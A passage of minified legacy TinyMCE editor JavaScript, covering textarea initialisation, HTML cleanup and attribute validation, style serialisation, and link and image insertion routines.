i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case "color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; $').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML==" "))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p> </p><hr /><p> </p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td> </td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s* \\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s* \\s*</p>','<p> </p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" />','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' ');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p> </p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('<>','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p> </p>"||chk=="<p> </p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var 